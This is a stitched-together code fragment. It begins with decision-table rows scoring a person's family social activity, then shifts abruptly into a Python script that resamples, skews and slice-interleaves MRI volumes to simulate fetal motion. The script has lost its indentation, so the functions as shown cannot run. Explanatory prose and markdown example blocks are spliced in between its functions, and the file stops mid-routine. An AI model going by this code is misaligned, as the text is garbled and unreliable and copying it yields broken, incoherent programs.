Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'increase', together_outside_last_7_days:'stable'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'stable', visits_last_7_days:'increase', together_outside_last_7_days:'increase'}, 'high increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'decrease', together_outside_last_7_days:'decrease'}, 'decrease'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'decrease', together_outside_last_7_days:'stable'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'decrease', together_outside_last_7_days:'increase'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'stable', together_outside_last_7_days:'decrease'}, 'stable'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'stable', together_outside_last_7_days:'stable'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'stable', together_outside_last_7_days:'increase'}, 'high increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'increase', together_outside_last_7_days:'decrease'}, 'increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'increase', together_outside_last_7_days:'stable'}, 'high increase'])
Relative_activity_Family.addFunctionRow([{calls_last_7_days:'increase', visits_last_7_days:'increase', together_outside_last_7_days:'increase'}, 'high increase'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'decrease', feat_calls_duration_family_relative:'decrease'}, 'decrease'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'decrease', feat_calls_duration_family_relative:'stable'}, 'decrease'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'decrease', feat_calls_duration_family_relative:'increase'}, 'stable'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'stable', feat_calls_duration_family_relative:'decrease'}, 'decrease'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'stable', feat_calls_duration_family_relative:'stable'}, 'stable'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'stable', feat_calls_duration_family_relative:'increase'}, 'increase'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'increase', feat_calls_duration_family_relative:'decrease'}, 'stable'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'increase', feat_calls_duration_family_relative:'stable'}, 'increase'])
calls_last_7_days.addFunctionRow([{feat_calls_count_family_relative:'increase', feat_calls_duration_family_relative:'increase'}, 'increase'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'decrease', feat_visits_family_relative:'decrease'}, 'decrease'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'decrease', feat_visits_family_relative:'stable'}, 'stable'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'decrease', feat_visits_family_relative:'increase'}, 'increase'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'stable', feat_visits_family_relative:'decrease'}, 'decrease'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'stable', feat_visits_family_relative:'stable'}, 'stable'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'stable', feat_visits_family_relative:'increase'}, 'increase'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'increase', feat_visits_family_relative:'decrease'}, 'decrease'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'increase', feat_visits_family_relative:'stable'}, 'stable'])
visits_last_7_days.addFunctionRow([{feat_visits_family_relative_past_week:'increase', feat_visits_family_relative:'increase'}, 'increase'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'decrease', feat_outside_family_relative:'decrease'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'decrease', feat_outside_family_relative:'stable'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'decrease', feat_outside_family_relative:'increase'}, 'stable'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'stable', feat_outside_family_relative:'decrease'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'stable', feat_outside_family_relative:'stable'}, 'stable'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'stable', feat_outside_family_relative:'increase'}, 'increase'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'increase', feat_outside_family_relative:'decrease'}, 'decrease'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'increase', feat_outside_family_relative:'stable'}, 'stable'])
together_outside_last_7_days.addFunctionRow([{feat_outside_family_relative_past_week:'increase', feat_outside_family_relative:'increase'}, 'increase'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'low'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'medium'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'high'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'low'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'medium'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'high'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'low'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'medium'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'low', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'high'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'low'}, 'very low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'medium'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'high'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'low'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'medium'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'high'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'low'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'medium'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'medium', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'high'}, 'very high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'low'}, 'low'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'medium'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'low', feat_outside_count_family_weekly_vs_goal:'high'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'low'}, 'medium'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'medium'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'medium', feat_outside_count_family_weekly_vs_goal:'high'}, 'very high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'low'}, 'high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'medium'}, 'very high'])
Absolute_daily_activity_Family.addFunctionRow([{feat_calls_count_family_weekly_vs_goal:'high', feat_visits_count_family_weekly_vs_goal:'high', feat_outside_count_family_weekly_vs_goal:'high'}, 'very high'])
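The `addFunctionRow` calls above enumerate complete decision tables: each row maps one combination of child attribute values to a parent value. As a library-independent illustration (proDEX itself is not required, and the function name here is hypothetical), the `calls_last_7_days` table from this model can be sketched as a plain Python lookup:

```python
# Sketch of the calls_last_7_days utility table defined above,
# keyed by (feat_calls_count_family_relative, feat_calls_duration_family_relative).
CALLS_LAST_7_DAYS_TABLE = {
    ('decrease', 'decrease'): 'decrease',
    ('decrease', 'stable'): 'decrease',
    ('decrease', 'increase'): 'stable',
    ('stable', 'decrease'): 'decrease',
    ('stable', 'stable'): 'stable',
    ('stable', 'increase'): 'increase',
    ('increase', 'decrease'): 'stable',
    ('increase', 'stable'): 'increase',
    ('increase', 'increase'): 'increase',
}

def calls_last_7_days_value(count_trend, duration_trend):
    """Resolve the aggregated call trend from its two child features."""
    return CALLS_LAST_7_DAYS_TABLE[(count_trend, duration_trend)]
```

Each internal node of the model resolves the same way, bottom-up, until `situ_social_activity_family` combines the two aggregated subtrees.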
# File: generateMotionFetal.py (repo: amiralansary/simulate_fetal_motion, license: Apache-2.0)
# library path
import os, sys
lib_path = os.path.abspath('/vol/biomedic/users/aa16914/lib/python2.7/site-packages/')
sys.path.insert(1,lib_path)
lib_path = os.path.abspath('/vol/biomedic/users/aa16914/lib/SimpleITK/build/Wrapping/build/lib.linux-x86_64-2.7/SimpleITK/')
sys.path.insert(1,lib_path)
import SimpleITK as sitk
import numpy as np
import math as mt
def resample_sitk(img, newSpacing, shiftOrigin=(0,0,0), interpolator=sitk.sitkBSpline):
""" This function transforms a nifti image
Attributes:
img: The fixed image that will be transformed (simpleitk type)
newSpacing: The translation vector in mm [tx,ty,tz]
shiftOrigin: The rotation vector that contains the angels in degrees [ax+,ax-,ay+,ay-,az+,az-]
interpolator: The resampling filter interpolator. For gray images use sitk.sitkBSpline, and for binary images choose sitk.sitkNearestNeighbor
Return:
img_resampled: The resampled image
"""
T = sitk.Transform(3,sitk.sitkIdentity)
resizeFilter = sitk.ResampleImageFilter()
resizeFilter.SetTransform(T)
oldSize = img.GetSize()
oldSpacing = img.GetSpacing()
newSize = ( int(oldSize[0] * oldSpacing[0] / newSpacing[0]),
int(oldSize[1] * oldSpacing[1] / newSpacing[1]),
int(oldSize[2] * oldSpacing[2] / newSpacing[2]) )
oldOrigin = img.GetOrigin()
oldDirection = img.GetDirection()
newOrigin = [x + y for x, y in zip(oldOrigin, shiftOrigin)]
newDirection = oldDirection
resizeFilter.SetOutputDirection(newDirection)
resizeFilter.SetInterpolator(interpolator)
resizeFilter.SetOutputSpacing(newSpacing)
resizeFilter.SetOutputOrigin(newOrigin)
resizeFilter.SetDefaultPixelValue(0)
resizeFilter.SetSize(newSize)
# resizeFilter.DebugOn()
img_resampled = resizeFilter.Execute(img)
return img_resampled
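The new grid size computed in `resample_sitk` follows directly from preserving the physical extent of the volume: `new_size = old_size * old_spacing / new_spacing`, truncated to integers. A SimpleITK-free sketch of that arithmetic (helper name hypothetical):

```python
def resampled_size(old_size, old_spacing, new_spacing):
    """Voxel grid size that preserves the physical extent under a new spacing."""
    return tuple(int(sz * osp / nsp)
                 for sz, osp, nsp in zip(old_size, old_spacing, new_spacing))

# A 256x256x100 volume at 1x1x2 mm resampled to isotropic 0.5 mm
# becomes a 512x512x400 grid.
```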
def transform_affine_sitk(fixed_image_sitk,translation_vector=[0,0,0],rotation_vector=[0,0,0],scaling_vector=[1,1,1],interpolator=sitk.sitkBSpline,spacing=None):
""" This function transforms a nifti image
Attributes:
fixed_image_sitk: The fixed image that will be transformed (simpleitk type)
translation_vector: The translation vector in mm [tx,ty,tz]
rotation_angels: The rotation vector that contains the angels in degrees [Rx,Ry,Rz]
scaling_vector: The scaling vector [Sx,Sy,Sz]
interpolator: The resampling filter interpolator. For gray images use sitk.sitkBSpline, and for binary images choose sitk.sitkNearestNeighbor
Return:
moving_image_sitk: The moving image that has been transformed
"""
# DefaultPixelValue = fixed_image_sitk.GetPixel(0,0,0)
size = fixed_image_sitk.GetSize()
origin = fixed_image_sitk.GetOrigin()
direction = fixed_image_sitk.GetDirection()
if spacing is None:
spacing = fixed_image_sitk.GetSpacing()
dimension = 3
Trans = sitk.Transform(dimension, sitk.sitkAffine)
# Translation
tx, ty, tz = translation_vector/np.array(spacing)
dt = np.array([tx,ty,tz]) # translation part; a 3D affine transform has 12 parameters (9 matrix + 3 translation)
# Rotation
theta_x, theta_y, theta_z = (mt.pi/180)*np.array(rotation_vector)
Rx = np.array([
[1, 0, 0],
[0, mt.cos(theta_x), -mt.sin(theta_x)],
[0, mt.sin(theta_x), mt.cos(theta_x)]])
Ry = np.array([
[mt.cos(theta_y), 0, mt.sin(theta_y)],
[0, 1, 0],
[-mt.sin(theta_y), 0, mt.cos(theta_y)]])
Rz = np.array([
[mt.cos(theta_z), -mt.sin(theta_z), 0],
[mt.sin(theta_z), mt.cos(theta_z), 0],
[0, 0, 1]])
R = Rz.dot(Ry).dot(Rx) # combined rotation R = Rz @ Ry @ Rx
# Scale
Sx, Sy, Sz = scaling_vector
R[0,0] = R[0,0]/Sx
R[1,1] = R[1,1]/Sy
R[2,2] = R[2,2]/Sz
# update transformation vector
trans_vector = np.concatenate((R.flatten(),dt),axis=0)
Trans.SetParameters(trans_vector.tolist())
# print(Trans)
# resample filter
resampleFilter = sitk.ResampleImageFilter()
resampleFilter.SetTransform(Trans)
resampleFilter.SetOutputDirection(direction)
resampleFilter.SetInterpolator(interpolator)
resampleFilter.SetOutputSpacing(spacing)
resampleFilter.SetOutputOrigin(origin)
resampleFilter.SetDefaultPixelValue(0)
resampleFilter.SetSize(size)
# transform the image
moving_image_sitk = resampleFilter.Execute(fixed_image_sitk)
return moving_image_sitk
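# A minimal, self-contained sketch of the rotation-matrix construction used above,
# composed as R = Rz @ Ry @ Rx (the angle values below are illustrative). A quick way
# to validate the composition is to check that R is a proper rotation: R @ R.T == I
# and det(R) == 1.

```python
import math as mt
import numpy as np

def rotation_matrix(rx_deg, ry_deg, rz_deg):
    """Build the combined rotation R = Rz @ Ry @ Rx from per-axis angles in degrees."""
    tx, ty, tz = np.radians([rx_deg, ry_deg, rz_deg])
    Rx = np.array([[1, 0, 0],
                   [0, mt.cos(tx), -mt.sin(tx)],
                   [0, mt.sin(tx), mt.cos(tx)]])
    Ry = np.array([[mt.cos(ty), 0, mt.sin(ty)],
                   [0, 1, 0],
                   [-mt.sin(ty), 0, mt.cos(ty)]])
    Rz = np.array([[mt.cos(tz), -mt.sin(tz), 0],
                   [mt.sin(tz), mt.cos(tz), 0],
                   [0, 0, 1]])
    return Rz @ Ry @ Rx

R = rotation_matrix(10, 20, 30)
# a proper rotation matrix is orthonormal with determinant +1
print(np.allclose(R @ R.T, np.eye(3)), np.isclose(np.linalg.det(R), 1.0))
```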
def transform_skew_sitk(fixed_image_sitk, translation=(0,0,0), scale=(1,1,1), skew=(0,0,0,0,0,0), interpolator=sitk.sitkBSpline, spacing=None):
""" This function transforms a nifti image
Attributes:
fixed_image_sitk: The fixed image that will be transformed (simpleitk type)
translation: The translation vector in mm [tx,ty,tz]
skew: The rotation vector that contains the angels in degrees [ax+,ax-,ay+,ay-,az+,az-]
scale: The scaling vector [Sx,Sy,Sz]
interpolator: The resampling filter interpolator. For gray images use sitk.sitkBSpline, and for binary images choose sitk.sitkNearestNeighbor
Return:
moving_image_sitk: The moving image that has been transformed
"""
# DefaultPixelValue = fixed_image_sitk.GetPixel(0,0,0)
size = fixed_image_sitk.GetSize()
origin = fixed_image_sitk.GetOrigin()
direction = fixed_image_sitk.GetDirection()
if spacing is None:
spacing = fixed_image_sitk.GetSpacing()
dimension = 3
print(skew)
print(np.array(skew))
skew = np.tan(np.radians(np.array(skew))) # convert the six skew angles in degrees to skew coefficients (tangents)
versor = (0,0,0,1.0)
skewTransformer = sitk.ScaleSkewVersor3DTransform(scale, skew, versor, translation)
print(skewTransformer)
# resample filter
resampleFilter = sitk.ResampleImageFilter()
resampleFilter.SetTransform(skewTransformer)
resampleFilter.SetOutputDirection(direction)
resampleFilter.SetInterpolator(interpolator)
resampleFilter.SetOutputSpacing(spacing)
resampleFilter.SetOutputOrigin(origin)
resampleFilter.SetDefaultPixelValue(0)
resampleFilter.SetSize(size)
# transform the image
moving_image_sitk = resampleFilter.Execute(fixed_image_sitk)
return moving_image_sitk
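# A small illustration of the degrees -> skew-coefficient conversion performed above:
# the skew transform expects tangents of the skew angles, so 0 degrees maps to a
# coefficient of 0 and 45 degrees maps to 1 (the angle values here are illustrative).

```python
import numpy as np

skew_deg = np.array([0, 0, 0, 45, 0, 0])
# same conversion as in transform_skew_sitk: degrees -> radians -> tan
skew_coeff = np.tan(np.radians(skew_deg))
print(skew_coeff)
```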
def moveImages(fixed_image_sitk, shiftOrigin=(0,0,0), newSpacing=(1.,1.,1.), interpolator=sitk.sitkBSpline, translation_vector_1=[0,0,0], translation_vector_2=[0,0,0],
skew_vector_1=(0,0,0,0,0,0), skew_vector_2=(0,0,0,0,0,0), scaling_vector_1=(1,1,1), scaling_vector_2=(1,1,1)):
""" Resample an image and produce two additional skew-transformed copies for slice interleaving """
# resample image
fixed_image_sitk0 = resample_sitk(fixed_image_sitk, newSpacing=newSpacing, shiftOrigin=shiftOrigin, interpolator=interpolator)
fixed_image_sitk1 = resample_sitk(fixed_image_sitk, newSpacing=newSpacing, shiftOrigin=shiftOrigin, interpolator=interpolator)
fixed_image_sitk2 = resample_sitk(fixed_image_sitk, newSpacing=newSpacing, shiftOrigin=shiftOrigin, interpolator=interpolator)
# Transform image
moving_image_sitk0 = fixed_image_sitk0
moving_image_sitk1 = transform_skew_sitk(fixed_image_sitk1, translation=translation_vector_1, scale=scaling_vector_1, skew=skew_vector_1, interpolator=interpolator)
moving_image_sitk2 = transform_skew_sitk(fixed_image_sitk2, translation=translation_vector_2, scale=scaling_vector_2, skew=skew_vector_2, interpolator=interpolator)
moving_image0 = sitk.GetArrayFromImage(moving_image_sitk0)
moving_image1 = sitk.GetArrayFromImage(moving_image_sitk1)
moving_image2 = sitk.GetArrayFromImage(moving_image_sitk2)
return moving_image_sitk0, moving_image0, moving_image1, moving_image2
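# The main() routine below interleaves slices from the three volumes returned by
# moveImages: every third slice is taken from a different transformed copy. A minimal
# numpy sketch of that pattern (with made-up constant volumes so the result is easy
# to read); note the .copy(), so the source volume is not mutated:

```python
import numpy as np

vol0 = np.zeros((6, 2, 2))
vol1 = np.ones((6, 2, 2))
vol2 = np.full((6, 2, 2), 2.0)
end = vol0.shape[0]
interleaved = vol0.copy()  # copy so vol0 itself is left untouched
interleaved[range(1, end, 3)] = vol1[range(1, end, 3)]
interleaved[range(2, end, 3)] = vol2[range(2, end, 3)]
print(interleaved[:, 0, 0])  # [0. 1. 2. 0. 1. 2.]
```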
def main():
image_path = 'brain_img.nii.gz'
mask_path = 'brain_mask.nii.gz'
# read image
fixed_image_sitk = sitk.ReadImage(image_path)
fixed_mask_sitk = sitk.ReadImage(mask_path)
fixed_image_mask_sitk = sitk.Mask(fixed_image_sitk,fixed_mask_sitk)
# build a binary-threshold filter to regenerate masks after reorientation
img_array = sitk.GetArrayFromImage(fixed_image_mask_sitk)
threshold_filter = sitk.BinaryThresholdImageFilter()
threshold_filter.SetLowerThreshold(1)
threshold_filter.SetUpperThreshold(int(img_array.max()))
direction_ax = (
1.0, 0.0, 0.0,
0.0, 1.0, 0.0,
0.0, 0.0, 1.0)
direction_co = (
1.0, 0.0, 0.0,
0.0, 0.0, 1.0,
0.0, 1.0, 0.0)
direction_sa = (
0.0, 0.0, 1.0,
0.0, 1.0, 0.0,
1.0, 0.0, 0.0)
img_ax = img_array.copy()
img_ax_sitk = sitk.GetImageFromArray(img_ax)
img_ax_sitk.SetDirection(direction_ax)
sitk.WriteImage(img_ax_sitk,'img_ax.nii.gz')
img_ax_mask = threshold_filter.Execute(img_ax_sitk)
sitk.WriteImage(img_ax_mask,'img_ax_mask.nii.gz')
img_co = np.swapaxes(img_array,0,1)
img_co_sitk = sitk.GetImageFromArray(img_co)
img_co_sitk.SetDirection(direction_co)
sitk.WriteImage(img_co_sitk,'img_co.nii.gz')
img_co_mask = threshold_filter.Execute(img_co_sitk)
sitk.WriteImage(img_co_mask,'img_co_mask.nii.gz')
img_sa = np.swapaxes(img_array,0,2)
img_sa_sitk = sitk.GetImageFromArray(img_sa)
img_sa_sitk.SetDirection(direction_sa)
sitk.WriteImage(img_sa_sitk,'img_sa.nii.gz')
img_sa_mask = threshold_filter.Execute(img_sa_sitk)
sitk.WriteImage(img_sa_mask,'img_sa_mask.nii.gz')
# # randomize transformation parameters
# translation_vector = np.random.choice(range(-4,4),3) # random translations between [-4,4] mm
# rotation_vector = np.random.choice(range(-10,10),3) # random rotation angles between [-10,10] degrees
skew_unit_vector = (1,1,1,1,1,1)
# first transformation parameters
skew_vector_1 = [1*x for x in skew_unit_vector]
scaling_vector_1 = (1,1,1)
translation_vector_1 = (0,0,0) # translate x mm in x,y,z
rotation_vector_1 = (0,0,0) # rotate x degrees in x,y,z
# second transformation parameters
# skew_unit_vector = (0,0,0,1,0,0)
skew_vector_2 = [-1*x for x in skew_unit_vector]
scaling_vector_2 = (1,1,1)
translation_vector_2 = (0,0,0) # translate x mm in x,y,z
rotation_vector_2 = (0,0,0) # rotate x degrees in x,y,z
################################################################################################################################################
## ---------------------------------------------------- Axial Image ------------------------------------------------------------------------- ##
################################################################################################################################################
# axial-1 (a1) [0,1,2]
newSpacing = (1.5,1.5,3)
shiftOrigin = (0,0,0)
moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_ax_sitk, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_ax_mask, shiftOrigin=shiftOrigin,
newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
end = moving_image0.shape[0]
sitk.WriteImage(moving_image_sitk0,'moving_img_a1.nii.gz')
# sample slices -------------------------------------------------------------------------
moving_mask = moving_mask0.copy() # copy so moving_mask0 is not mutated and can be reused below
moving_mask[range(0,end,3)] = moving_mask0[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask1[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask2[range(2,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_a1.nii.gz")
moving_image = moving_image0.copy() # copy so moving_image0 is not mutated and can be reused below
moving_image[range(0,end,3)] = moving_image0[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image1[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image2[range(2,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"img_a1.nii.gz")
sitk.WriteImage(moving_image_sitk_final,"moving_image_a1.nii.gz")
moving_image_sitk_final1 = sitk.GetImageFromArray(moving_image1)
moving_image_sitk_final1.CopyInformation(moving_image_sitk0)
sitk.WriteImage(moving_image_sitk_final1,"img_a2.nii.gz")
moving_image_sitk_final2 = sitk.GetImageFromArray(moving_image2)
moving_image_sitk_final2.CopyInformation(moving_image_sitk0)
sitk.WriteImage(moving_image_sitk_final2,"img_a3.nii.gz")
# # axial-2 (a2) [2,1,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_ax_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_ax_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[0]
moving_mask = moving_mask0.copy()
moving_mask[range(2,end,3)] = moving_mask0[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask1[range(0,end,3)]
moving_mask[range(1,end,3)] = moving_mask2[range(1,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_a2.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(2,end,3)] = moving_image0[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image1[range(0,end,3)]
moving_image[range(1,end,3)] = moving_image2[range(1,end,3)]
moving_image[moving_image<0] = 0
moving_image_sitk_final = sitk.GetImageFromArray(moving_image)
moving_image_sitk_final.CopyInformation(moving_image_sitk0)
moving_image_sitk_final = sitk.Mask(moving_image_sitk_final, moving_mask_sitk_final, 0)
sitk.WriteImage(moving_image_sitk_final,"moving_image_a2.nii.gz")
# # axial-3 (a3) [1,2,0]
# shiftOrigin = (0,0,0)
# moving_image_sitk0, moving_image0, moving_image1, moving_image2 = moveImages(img_ax_sitk, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkBSpline, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# moving_mask_sitk0, moving_mask0, moving_mask1, moving_mask2 = moveImages(img_ax_mask, shiftOrigin=shiftOrigin,
# newSpacing=newSpacing, interpolator=sitk.sitkNearestNeighbor, translation_vector_1=translation_vector_1, translation_vector_2=translation_vector_2,
# skew_vector_1=skew_vector_1, skew_vector_2=skew_vector_2, scaling_vector_1=scaling_vector_1, scaling_vector_2=scaling_vector_2)
# end = moving_image0.shape[0]
moving_mask = moving_mask0.copy()
moving_mask[range(1,end,3)] = moving_mask0[range(1,end,3)]
moving_mask[range(2,end,3)] = moving_mask1[range(2,end,3)]
moving_mask[range(0,end,3)] = moving_mask2[range(0,end,3)]
moving_mask_sitk_final = sitk.GetImageFromArray(np.array(moving_mask,dtype=np.uint8))
moving_mask_sitk_final.CopyInformation(moving_mask_sitk0)
sitk.WriteImage(moving_mask_sitk_final,"moving_mask_a3.nii.gz")
moving_image = moving_image0.copy()
moving_image[range(1,end,3)] = moving_image0[range(1,end,3)]
moving_image[range(2,end,3)] = moving_image1[range(2,end,3)]
moving_image[range(0,end,3)] = moving_image2[range(0,end,3)]
moving_image[moving_image<0] = 0
